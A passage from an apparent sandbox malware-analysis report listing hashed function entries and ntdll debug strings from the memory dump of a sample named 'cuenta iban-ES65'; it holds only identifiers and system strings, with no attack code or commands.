Instruction Fuzzy Hash: D790027122140462D5006259891570F000547D0302F51C526A1158955EC63588557571

Uniqueness

Uniqueness Score: -1.00%

Function 37772E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2a31988967b430ce33d9e365791a25cf6da3bfb89d2f12a0170b248772f89e7
Instruction ID: 4b3fa9d9cdc15dbe307af7150674688bc6921fc67718cda74eae54918039832e
Opcode Fuzzy Hash: f2a31988967b430ce33d9e365791a25cf6da3bfb89d2f12a0170b248772f89e7
Instruction Fuzzy Hash: 769002A1231000A2D5046259850570A004547E1201F51C527A2148954DC5398C657125

Uniqueness

Uniqueness Score: -1.00%

Function 37772D50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82b5839539278ccfabbd01f6dc6ee8df86fa3e76b0055c1ad7c84092745ca2ea
Instruction ID: 4c914824a54357492437bd0b9206f57c2c39878a8f18c8ffc9a2e88c7bc2a357
Opcode Fuzzy Hash: 82b5839539278ccfabbd01f6dc6ee8df86fa3e76b0055c1ad7c84092745ca2ea
Instruction Fuzzy Hash: 5090026132100462D5026259851560A000987D1345F91C527E1418955EC6358957B132

Uniqueness

Uniqueness Score: -1.00%

Function 37772DC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f1b170321a50dab617927f73d4c22d80e9dd961c1fb9a0c1004cdafcf52a88
Instruction ID: 6fa362a15a004fc5c875562420ffd7ec22d6f43c0b5279022655dd39ef761b3b
Opcode Fuzzy Hash: 90f1b170321a50dab617927f73d4c22d80e9dd961c1fb9a0c1004cdafcf52a88
Instruction Fuzzy Hash: E89002B122100462D5407259850574A000547D0301F51C526A5058954FC6698DD97665

Uniqueness

Uniqueness Score: -1.00%

Function 37772DA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c8866513bd16e0e739dc1eec05b9f3e5caa0500d45595934cf41ff1c99e3af8
Instruction ID: 3069bdbee7843d4447da4ffbc075c8fd5ccffd783184ffdc1682a6b6d4e1fcc0
Opcode Fuzzy Hash: 1c8866513bd16e0e739dc1eec05b9f3e5caa0500d45595934cf41ff1c99e3af8
Instruction Fuzzy Hash: F490026162100562D5017259850561A000A47D0241F91C537A1018955FCA358996B131

Uniqueness

Uniqueness Score: -1.00%

Function 37772C50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d07e5b458fbeacea4a290ebb676d91e13953649c05b4492fc2465f2d7fddb7
Instruction ID: d3f1ecae11c06125a3f625d6e90cb01fa1124bbabeb799d3328da13a12d5c377
Opcode Fuzzy Hash: 47d07e5b458fbeacea4a290ebb676d91e13953649c05b4492fc2465f2d7fddb7
Instruction Fuzzy Hash: 4390026132100063D5407259951960A400597E1301F51D526E0408954DD925885A7222

Uniqueness

Uniqueness Score: -1.00%

Function 37773C30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca5ddca35ad2454df7bf8d82a5b8100c2b9fbba9f1a8b0e07414e1542a5ca15
Instruction ID: d16fb95bd84b6470082c646c20ef1e3780ce3046d65f69cddc7f988e4e895dbc
Opcode Fuzzy Hash: 0ca5ddca35ad2454df7bf8d82a5b8100c2b9fbba9f1a8b0e07414e1542a5ca15
Instruction Fuzzy Hash: E3900271222001A2994063599905A4E410547E1302B91D92AA0009954DC92488657221

Uniqueness

Uniqueness Score: -1.00%

Function 37772C30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fca346b7b14b78626f6b7687504e3d22abe8841c7e02c45ee5413826da9c3c6b
Instruction ID: 9b771eea91c68875c2ccee4bbe2b77e597fa2ce4ce9af219c99d67d251730752
Opcode Fuzzy Hash: fca346b7b14b78626f6b7687504e3d22abe8841c7e02c45ee5413826da9c3c6b
Instruction Fuzzy Hash: 6390026923300062D5807259950960E000547D1202F91D92AA0009958DC925886D7321

Uniqueness

Uniqueness Score: -1.00%

Function 37772C20 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 322570297826d3d8fabec48091acda0cfc7f6a6760d9282772c02d275417d36a
Instruction ID: ac352b5b823e514fc46cbd60ad654cbf0b0cfb1e3ee5eb516563b05961e19ce3
Opcode Fuzzy Hash: 322570297826d3d8fabec48091acda0cfc7f6a6760d9282772c02d275417d36a
Instruction Fuzzy Hash: 3E900261225044A2D50066599509A0A000547D0205F51D526A1058995EC6358855B131

Uniqueness

Uniqueness Score: -1.00%

Function 37772C10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ff986100cf062b17c17b3520d433e7907c034609b0a94092b51506d4a111658
Instruction ID: c99b1c026ec4a398b236acf7df68411a558f8bd3e4066874f8285a535be66aa7
Opcode Fuzzy Hash: 6ff986100cf062b17c17b3520d433e7907c034609b0a94092b51506d4a111658
Instruction Fuzzy Hash: 2090027122100463D5006259960970B000547D0201F51D926A0418958ED66688557121

Uniqueness

Uniqueness Score: -1.00%

Function 37772CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268b284bde1f7ae873343356be2d25e6b2048385ce9a73019dd4d5815796e95e
Instruction ID: 1e1e0146395bfaaf36c9b0fe2f533633258aabf9bbd1eb31baf469d2bb01c034
Opcode Fuzzy Hash: 268b284bde1f7ae873343356be2d25e6b2048385ce9a73019dd4d5815796e95e
Instruction Fuzzy Hash: A8900261262041B25945B259850550B400657E0241791C527A1408D50DC536985AF621

Uniqueness

Uniqueness Score: -1.00%

Function 37772CD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e7ffb30aa19fd9b768f1019e86cf62327a230174a743ba525a252d6c0781011
Instruction ID: 2d3e1b765b2d186325ee0b1367bdc45104e3d20e2b4e11ca9e5f113f1ef780f7
Opcode Fuzzy Hash: 8e7ffb30aa19fd9b768f1019e86cf62327a230174a743ba525a252d6c0781011
Instruction Fuzzy Hash: 8690027126100462D5417259850560A000957D0241F91C527A0418954FC6658A5ABA61

Uniqueness

Uniqueness Score: -1.00%

Function 37773C90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf60a5209c5250b58575246bfb214910cde35980902e36d52762015a50a40b7c
Instruction ID: c6bf80290ed07b9c41ed2bccb86e24a167a1f11a227cadfa608b692b1bfa06a5
Opcode Fuzzy Hash: cf60a5209c5250b58575246bfb214910cde35980902e36d52762015a50a40b7c
Instruction Fuzzy Hash: 7090027522100462D9106259990564A004647D0301F51D926A0418958EC66488A5B121

Uniqueness

Uniqueness Score: -1.00%

Function 37772B10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58b09f0bc32ee56d89887504a359d78d90f132678bd59f776324d04492dc82ca
Instruction ID: 3fe735e7cfe39673f669298e34dbb4df1ccf4e5efbc88c908a6d0f45a9667cb7
Opcode Fuzzy Hash: 58b09f0bc32ee56d89887504a359d78d90f132678bd59f776324d04492dc82ca
Instruction Fuzzy Hash: 8590027122100862D5807259850564E000547D1301F91C52AA0019A54ECA258A5D77A1

Uniqueness

Uniqueness Score: -1.00%

Function 37772B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 947ea489072ff843c030ca488d658accb482bc6577057b205d4e044b35ff9b92
Instruction ID: 55bb25aa5430564af7fe35f67b4031ad6656bc249a2ece9a477e502581e04d97
Opcode Fuzzy Hash: 947ea489072ff843c030ca488d658accb482bc6577057b205d4e044b35ff9b92
Instruction Fuzzy Hash: 0E900271225048A2D54072598505A4A001547D0305F51C526A0058A94ED6358D59B661

Uniqueness

Uniqueness Score: -1.00%

Function 37772BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fee910c1f44044cdb9cae6196b566b480764bbb8511bd26c5fb77e091f2d712
Instruction ID: b61d8d2f6531f7517b2b36870c1dbbff837c0e882f5bc230cfa8ebf07ee66d28
Opcode Fuzzy Hash: 3fee910c1f44044cdb9cae6196b566b480764bbb8511bd26c5fb77e091f2d712
Instruction Fuzzy Hash: 5490026162500462D5407259951970A001547D0201F51D526A0018954EC6698A5976A1

Uniqueness

Uniqueness Score: -1.00%

Function 37772BC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231f757e5d1af769b72c0910793e993541d11e5a5edb13499ca1e87b50ef29b5
Instruction ID: a0180e1e3507f82739858fbe0e4fbf1b6bdb5ef58ec0cf75ad2b42c9514ba362
Opcode Fuzzy Hash: 231f757e5d1af769b72c0910793e993541d11e5a5edb13499ca1e87b50ef29b5
Instruction Fuzzy Hash: AB90027122100462D5006699950964A000547E0301F51D526A5018955FC67588957131

Uniqueness

Uniqueness Score: -1.00%

Function 37772B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 633b15742a97549cab671641489dcc62e51e23e9828bee5555a161920a39df09
Instruction ID: 4eb76e28ef535c12bf6ed2e4441acfcd4070a0e40ccc058945a25f378045c555
Opcode Fuzzy Hash: 633b15742a97549cab671641489dcc62e51e23e9828bee5555a161920a39df09
Instruction Fuzzy Hash: 26900271221008A2D50062598505B4A000547E0301F51C52BA0118A54EC625C8557521

Uniqueness

Uniqueness Score: -1.00%

Function 37772A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b9af1a602bdccdb6eff74b6ebc17d8d66b9cd7e57f89d84c0fa457532978e0d
Instruction ID: 802e1ac633ef27092e084b33732f86eba1c1207736d62f84617d2acba738be9d
Opcode Fuzzy Hash: 8b9af1a602bdccdb6eff74b6ebc17d8d66b9cd7e57f89d84c0fa457532978e0d
Instruction Fuzzy Hash: 11900265231000620545A659470550F044557D6351391C52AF140A990DC63188697321

Uniqueness

Uniqueness Score: -1.00%

Function 37772AC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab8aba47d95493e53ba3dd90adedf26002fc4d09d44abadbe53110b43a9781fe
Instruction ID: 115473b92a276031c3aacb71f87dc898aba05a0db320e48295eeeb7c5c78007a
Opcode Fuzzy Hash: ab8aba47d95493e53ba3dd90adedf26002fc4d09d44abadbe53110b43a9781fe
Instruction Fuzzy Hash: 3D90027162500862D5507259851574A000547D0301F51C526A0018A54EC7658A5976A1

Uniqueness

Uniqueness Score: -1.00%

Function 37772B20 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 7167c00f8df74adf962ed74c0d1257221153688ea262519df45ef41f69ff2f88
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 3780A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 3780A25D
RtlDebugPrintTimes.NTDLL ref: 3780A2F1
RtlDebugPrintTimes.NTDLL ref: 3780A314
RtlDebugPrintTimes.NTDLL ref: 3780A340
RtlDebugPrintTimes.NTDLL ref: 3780A415
RtlDebugPrintTimes.NTDLL ref: 3780A468
RtlDebugPrintTimes.NTDLL ref: 3780A487
RtlDebugPrintTimes.NTDLL ref: 3780A4B8

Strings

HEAP: , xrefs: 3780A206

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: 5a54a33650966cba26911378c383724345947047606cde5e177cd1dcebd13d4d
Instruction ID: e047a8cd3fc6361160b88f32918fffff8e6f85600d1e0f2a5a3179d41774f9b9
Opcode Fuzzy Hash: 5a54a33650966cba26911378c383724345947047606cde5e177cd1dcebd13d4d
Instruction Fuzzy Hash: D5A198756047119FD704CE28C8D4AAABBE5FF98760F05452AE945EB310EB34EC4ACF92

Uniqueness

Uniqueness Score: -1.00%

Function 37767550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 377A4507
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 377A4460
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 377A454D
ExecuteOptions, xrefs: 377A44AB
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 377A4530
CLIENT(ntdll): Processing section info %ws..., xrefs: 377A4592
Execute=1, xrefs: 377A451E

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 1b02a900e75ca5102bebb22f2aea90f7291ff5edb5b0074fed07dc8f80ef3db2
Instruction ID: 63642e75f0e18aa6e1ca0c67458bd0e581cfc1db32e80115d3782a0cf7c1f89d
Opcode Fuzzy Hash: 1b02a900e75ca5102bebb22f2aea90f7291ff5edb5b0074fed07dc8f80ef3db2
Instruction Fuzzy Hash: 78512B717003196AEF109A98DC9DFED73A9AF04398F4005EDD905AF185EB74AA41CF92

Uniqueness

Uniqueness Score: -1.00%

Function 3774A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

SsHd, xrefs: 3774A304
RtlpFindActivationContextSection_CheckParameters, xrefs: 377977DD, 37797802
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 377977E2
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 377978F3
Actx , xrefs: 37797819, 37797880
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37797807

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 73cb5ebd6cc8c080a2ea861260dd61167c849a807f0b03767cf7884c3696cb68
Instruction ID: e1c4e632c1f68bf7f728481a9d7309e0607f12a1ca1a05f4a47eb955c9e41416
Opcode Fuzzy Hash: 73cb5ebd6cc8c080a2ea861260dd61167c849a807f0b03767cf7884c3696cb68
Instruction Fuzzy Hash: 4CE1D2746043018FE714CE28C8D5BAAB7E6BB85364F524A3DF865CF290DB31E845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 3774D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 37799299

Strings

RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 37799372
GsHd, xrefs: 3774D794
RtlpFindActivationContextSection_CheckParameters, xrefs: 3779914E, 37799173
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37799153
Actx , xrefs: 37799315
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37799178

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: 51e99a18ce31da9c4400f7e915048a45467112eb82aa994fb9ebaf924332072a
Instruction ID: e6bbb582403038900c924b7cbd911abbc0aec5d66957de804181dc9f5b484dab
Opcode Fuzzy Hash: 51e99a18ce31da9c4400f7e915048a45467112eb82aa994fb9ebaf924332072a
Instruction Fuzzy Hash: F6E17D74604341DFE710CF14C884BAAB7E6BB89368F414E7DEA959F281D771E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 377DF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 377DF0D6

Strings

HEAP: , xrefs: 377DF274, 377DF321, 377DF378
Just allocated block at %p for %Ix bytes, xrefs: 377DF288
RtlAllocateHeap, xrefs: 377DF0ED
HEAP[%wZ]: , xrefs: 377DF267, 377DF314, 377DF36B
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 377DF33E
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 377DF389

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: cb36946c55053f17e158d9efb838525d055031a723d6f05d8fad624f2e0c80ae
Instruction ID: 369d205436b88cd1539c023f00f014faf56a5baf76b8877116f7be987f2cb471
Opcode Fuzzy Hash: cb36946c55053f17e158d9efb838525d055031a723d6f05d8fad624f2e0c80ae
Instruction Fuzzy Hash: AB91F075900644DFDB01CFA4C854BADBBF2FF49320F14885AE864AF251DB7AA942DF11

Uniqueness

Uniqueness Score: -1.00%

Function 377AFA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 377AFAF3
